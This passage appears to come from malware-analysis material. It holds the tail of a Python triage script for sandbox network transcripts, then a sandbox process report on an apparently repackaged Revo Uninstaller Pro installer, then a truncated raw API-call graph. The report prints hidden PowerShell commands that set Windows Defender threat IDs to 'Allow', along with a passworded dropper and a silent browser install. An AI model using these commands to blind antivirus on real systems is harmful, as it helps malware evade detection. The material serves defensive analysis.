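    direction: str               # OUT: sandbox VM -> remote host; IN: remote host -> VM
    start_line: str              # request line, status line, or "Data Raw: ..."
    headers: Dict[str, str] = field(default_factory=dict)
    raw: Optional[bytes] = None  # decoded payload for "Data Raw:" rows


def parse_transcript(text: str) -> List[Message]:
    """Group the rows of a flattened transcript into messages.

    A row opens a message; the header lines that follow it, up to the next
    row, belong to that message. "Data Ascii:" lines are the report's own
    rendering of the preceding raw bytes and are skipped.
    """
    messages: List[Message] = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("Data Ascii:"):
            continue
        m = ROW.match(stripped)
        if m:
            ts, nbytes, direction, first = m.groups()
            msg = Message(ts, int(nbytes), direction, first)
            if first.startswith("Data Raw:"):
                msg.raw = bytes.fromhex(first[len("Data Raw:"):])
            messages.append(msg)
        elif messages and ":" in stripped:
            name, _, value = stripped.partition(":")
            messages[-1].headers[name.strip().lower()] = value.strip()
    return messages


def decode_basic_auth(value: str) -> Optional[Tuple[str, str]]:
    """Return (user, password) from an HTTP Basic credential, None otherwise."""
    scheme, _, token = value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, _, password = decoded.partition(":")
    return user, password


def triage(messages: List[Message]) -> dict:
    """Collect the facts an analyst checks first in a session transcript."""
    report = {"hosts": set(), "basic_credentials": [],
              "redirects": [], "truncated_payloads": []}
    for msg in messages:
        host = msg.headers.get("host")
        if host:
            report["hosts"].add(host)
        auth = msg.headers.get("authorization")
        if auth:
            creds = decode_basic_auth(auth)
            if creds:
                # A fixed token with an empty password on every request is
                # typical of an application-wide client credential.
                report["basic_credentials"].append((host,) + creds)
        location = msg.headers.get("location")
        if location:
            report["redirects"].append(location)
        # The report shortens long Data Raw lines: fewer bytes shown than
        # declared means the capture on the page is incomplete.
        if msg.raw is not None and len(msg.raw) != msg.declared_bytes:
            report["truncated_payloads"].append(
                (msg.timestamp, msg.declared_bytes, len(msg.raw)))
    return report


if __name__ == "__main__":
    for key, value in triage(parse_transcript(SAMPLE)).items():
        print(key, value)
```

Run it as-is to see the summary for the constructed sample; to apply it to a full report, paste the session rows (with their header continuation lines) into SAMPLE or read them from a file. The row regex keys on the "UTC<bytes><IN|OUT>" fusion that the flattened export produces, so it only needs adjusting if the report is exported in a different layout.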


                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:11:52:30
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:22'221'229 bytes
                                                                                                                                                                          MD5 hash:881464F03502D44E29E5FEA8B4C35538
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:11:52:52
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
                                                                                                                                                                          Imagebase:0x7ff683040000
                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:5
                                                                                                                                                                          Start time:11:52:54
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\runonce.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\system32\runonce.exe" -r
                                                                                                                                                                          Imagebase:0x7ff61c920000
                                                                                                                                                                          File size:61'952 bytes
                                                                                                                                                                          MD5 hash:9ADEF025B168447C1E8514D919CB5DC0
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:11:52:55
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\grpconv.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\System32\grpconv.exe" -o
                                                                                                                                                                          Imagebase:0x7ff687230000
                                                                                                                                                                          File size:52'736 bytes
                                                                                                                                                                          MD5 hash:8531882ACC33CB4BDC11B305A01581CE
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:8
                                                                                                                                                                          Start time:11:52:56
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
                                                                                                                                                                          Imagebase:0x7ff7a08e0000
                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                          MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:9
                                                                                                                                                                          Start time:11:52:57
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                          File size:25'576'112 bytes
                                                                                                                                                                          MD5 hash:EE15BFE5A394ADBFB087B053A6A72821
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:10
                                                                                                                                                                          Start time:11:53:05
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:10'103'264 bytes
                                                                                                                                                                          MD5 hash:216B49B7EB7BE44D7ED7367F3725285F
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000A.00000000.2096953602.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:12
                                                                                                                                                                          Start time:11:53:08
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                          File size:25'576'112 bytes
                                                                                                                                                                          MD5 hash:EE15BFE5A394ADBFB087B053A6A72821
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:14
                                                                                                                                                                          Start time:11:53:14
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123
                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:15
                                                                                                                                                                          Start time:11:53:14
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:16
                                                                                                                                                                          Start time:11:53:14
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
                                                                                                                                                                          Imagebase:0xfd0000
                                                                                                                                                                          File size:419'886 bytes
                                                                                                                                                                          MD5 hash:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 30%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:17
                                                                                                                                                                          Start time:11:53:15
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:18
                                                                                                                                                                          Start time:11:53:15
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:19
                                                                                                                                                                          Start time:11:53:17
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:10'103'264 bytes
                                                                                                                                                                          MD5 hash:216B49B7EB7BE44D7ED7367F3725285F
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:21
                                                                                                                                                                          Start time:11:53:28
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:22
                                                                                                                                                                          Start time:11:53:28
Start date: 09/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 11:53:42
Start date: 09/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
Imagebase: 0x3a0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 11:53:42
Start date: 09/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 11:53:58
Start date: 09/12/2024
Path: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
Imagebase: 0x400000
File size: 174'444 bytes
MD5 hash: 7ACCFDE96C04320BA099144A7BE710CC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 25%, ReversingLabs
Has exited: true

Target ID: 27
Start time: 11:54:05
Start date: 09/12/2024
Path: C:\Users\user\Downloads\OperaSetup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
Imagebase: 0x340000
File size: 2'227'280 bytes
MD5 hash: 5A1105F1C25A60B128D45EC03041BF48
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 28
Start time: 11:54:07
Start date: 09/12/2024
Path: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --silent --allusers=0 --server-tracking-blob=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
Imagebase: 0xd0000
File size: 5'740'952 bytes
MD5 hash: F9DA76E8D7DB633AB031EE5AC59BB55E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited: false

Target ID: 29
Start time: 11:54:07
Start date: 09/12/2024
Path: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
Imagebase: 0xd0000
File size: 5'740'952 bytes
MD5 hash: F9DA76E8D7DB633AB031EE5AC59BB55E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 30
Start time: 11:54:08
Start date: 09/12/2024
Path: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
Imagebase: 0x190000
File size: 5'740'952 bytes
MD5 hash: F9DA76E8D7DB633AB031EE5AC59BB55E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited: true

Target ID: 31
Start time: 11:54:09
Start date: 09/12/2024
Path: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
Imagebase: 0xd0000
File size: 5'740'952 bytes
MD5 hash: F9DA76E8D7DB633AB031EE5AC59BB55E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 32
Start time: 11:54:10
Start date: 09/12/2024
Path: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
Imagebase: 0xd0000
File size: 5'740'952 bytes
MD5 hash: F9DA76E8D7DB633AB031EE5AC59BB55E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false


Execution Graph

Execution Coverage: 32.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.2%
Total number of Nodes: 1392
Total number of Limit Nodes: 52
execution_graph: raw node and edge listing (node ids, code addresses, resolved API names and node->node edges) of the rendered graph; not reproducible as readable text here.
4509->4514 4511->4516 4517 404a35 SendMessageW 4511->4517 4512->4511 4513 404977 4518 404a6b SendMessageW 4513->4518 4525 404643 KiUserCallbackDispatcher 4514->4525 4517->4516 4518->4496 4520 40488a GetDlgItem 4526 404656 SendMessageW 4520->4526 4522 4048a0 SendMessageW 4523 4048c6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4048bd GetSysColor 4522->4524 4523->4516 4524->4523 4525->4520 4526->4522 4527->4513 4531 405cc8 ShellExecuteExW 4528->4531 4530 4049f5 LoadCursorW SetCursor 4530->4502 4531->4530 4532 402663 4533 402692 4532->4533 4534 402677 4532->4534 4536 4026c2 4533->4536 4537 402697 4533->4537 4535 402da9 21 API calls 4534->4535 4547 40267e 4535->4547 4539 402dcb 21 API calls 4536->4539 4538 402dcb 21 API calls 4537->4538 4540 40269e 4538->4540 4541 4026c9 lstrlenW 4539->4541 4549 4066c4 WideCharToMultiByte 4540->4549 4541->4547 4543 4026b2 lstrlenA 4543->4547 4544 40270c 4545 4026f6 4545->4544 4546 406244 WriteFile 4545->4546 4546->4544 4547->4544 4547->4545 4548 406273 5 API calls 4547->4548 4548->4545 4549->4543 3939 403665 SetErrorMode GetVersionExW 3940 4036f1 3939->3940 3941 4036b9 GetVersionExW 3939->3941 3942 403748 3940->3942 3943 406a96 5 API calls 3940->3943 3941->3940 3944 406a26 3 API calls 3942->3944 3943->3942 3945 40375e lstrlenA 3944->3945 3945->3942 3946 40376e 3945->3946 3947 406a96 5 API calls 3946->3947 3948 403775 3947->3948 3949 406a96 5 API calls 3948->3949 3950 40377c 3949->3950 3951 406a96 5 API calls 3950->3951 3952 403788 #17 OleInitialize SHGetFileInfoW 3951->3952 4027 4066a2 lstrcpynW 3952->4027 3955 4037d7 GetCommandLineW 4028 4066a2 lstrcpynW 3955->4028 3957 4037e9 3958 405f9e CharNextW 3957->3958 3959 40380f CharNextW 3958->3959 3969 403821 3959->3969 3960 403923 3961 403937 GetTempPathW 3960->3961 4029 403634 3961->4029 3963 40394f 3964 403953 GetWindowsDirectoryW lstrcatW 3963->3964 3965 4039a9 DeleteFileW 3963->3965 3967 403634 12 API calls 3964->3967 4039 4030f5 GetTickCount 
GetModuleFileNameW 3965->4039 3966 405f9e CharNextW 3966->3969 3970 40396f 3967->3970 3969->3960 3969->3966 3973 403925 3969->3973 3970->3965 3972 403973 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3970->3972 3971 4039bd 3974 403bb0 ExitProcess CoUninitialize 3971->3974 3981 405f9e CharNextW 3971->3981 4010 403a64 3971->4010 3975 403634 12 API calls 3972->3975 4125 4066a2 lstrcpynW 3973->4125 3976 403bc2 3974->3976 3977 403be6 3974->3977 3979 4039a1 3975->3979 3980 405d02 MessageBoxIndirectW 3976->3980 3982 403c6a ExitProcess 3977->3982 3983 403bee GetCurrentProcess OpenProcessToken 3977->3983 3979->3965 3979->3974 3986 403bd0 ExitProcess 3980->3986 3991 4039dc 3981->3991 3987 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 3983->3987 3988 403c3a 3983->3988 3987->3988 3990 406a96 5 API calls 3988->3990 3989 403a74 3989->3974 4001 403c41 3990->4001 3992 403a3a 3991->3992 3993 403a7d 3991->3993 3996 406079 18 API calls 3992->3996 4128 405c6d 3993->4128 3995 403c56 ExitWindowsEx 3995->3982 3998 403c63 3995->3998 3999 403a46 3996->3999 4002 40140b 2 API calls 3998->4002 3999->3974 4126 4066a2 lstrcpynW 3999->4126 4001->3995 4001->3998 4002->3982 4003 403a9c 4005 403ab4 4003->4005 4132 4066a2 lstrcpynW 4003->4132 4009 403ada wsprintfW 4005->4009 4024 403b06 4005->4024 4006 403a59 4127 4066a2 lstrcpynW 4006->4127 4011 4066df 21 API calls 4009->4011 4069 403d74 4010->4069 4011->4005 4014 403b50 SetCurrentDirectoryW 4017 406462 40 API calls 4014->4017 4015 403b16 GetFileAttributesW 4016 403b22 DeleteFileW 4015->4016 4015->4024 4016->4024 4019 403b5f CopyFileW 4017->4019 4018 403b4e 4018->3974 4019->4018 4019->4024 4020 405dae 71 API calls 4020->4024 4021 406462 40 API calls 4021->4024 4022 4066df 21 API calls 4022->4024 4023 405c85 2 API calls 4023->4024 4024->4005 4024->4009 4024->4014 4024->4015 4024->4018 4024->4020 4024->4021 4024->4022 4024->4023 4025 403bd8 CloseHandle 4024->4025 4026 4069ff 2 API calls 4024->4026 4133 405bf6 
CreateDirectoryW 4024->4133 4136 405c50 CreateDirectoryW 4024->4136 4025->4018 4026->4024 4027->3955 4028->3957 4030 406950 5 API calls 4029->4030 4032 403640 4030->4032 4031 40364a 4031->3963 4032->4031 4033 405f71 3 API calls 4032->4033 4034 403652 4033->4034 4035 405c50 2 API calls 4034->4035 4036 403658 4035->4036 4037 4061c1 2 API calls 4036->4037 4038 403663 4037->4038 4038->3963 4139 406192 GetFileAttributesW CreateFileW 4039->4139 4041 403138 4068 403145 4041->4068 4140 4066a2 lstrcpynW 4041->4140 4043 40315b 4044 405fbd 2 API calls 4043->4044 4045 403161 4044->4045 4141 4066a2 lstrcpynW 4045->4141 4047 40316c GetFileSize 4048 403266 4047->4048 4059 403183 4047->4059 4049 403053 36 API calls 4048->4049 4050 40326f 4049->4050 4052 4032ab GlobalAlloc 4050->4052 4050->4068 4143 40361d SetFilePointer 4050->4143 4051 403607 ReadFile 4051->4059 4055 4032c2 4052->4055 4054 403303 4057 403053 36 API calls 4054->4057 4060 4061c1 2 API calls 4055->4060 4056 40328c 4058 403607 ReadFile 4056->4058 4057->4068 4061 403297 4058->4061 4059->4048 4059->4051 4059->4054 4062 403053 36 API calls 4059->4062 4059->4068 4063 4032d3 CreateFileW 4060->4063 4061->4052 4061->4068 4062->4059 4064 40330d 4063->4064 4063->4068 4142 40361d SetFilePointer 4064->4142 4066 40331b 4067 403396 48 API calls 4066->4067 4067->4068 4068->3971 4070 406a96 5 API calls 4069->4070 4071 403d88 4070->4071 4072 403da0 4071->4072 4073 403d8e 4071->4073 4074 406570 3 API calls 4072->4074 4159 4065e9 wsprintfW 4073->4159 4075 403dd0 4074->4075 4077 403def lstrcatW 4075->4077 4079 406570 3 API calls 4075->4079 4078 403d9e 4077->4078 4144 40404a 4078->4144 4079->4077 4082 406079 18 API calls 4083 403e21 4082->4083 4084 403eb5 4083->4084 4086 406570 3 API calls 4083->4086 4085 406079 18 API calls 4084->4085 4087 403ebb 4085->4087 4093 403e53 4086->4093 4088 403ecb LoadImageW 4087->4088 4089 4066df 21 API calls 4087->4089 4090 403f71 4088->4090 4091 403ef2 RegisterClassW 4088->4091 4089->4088 4095 40140b 2 API 
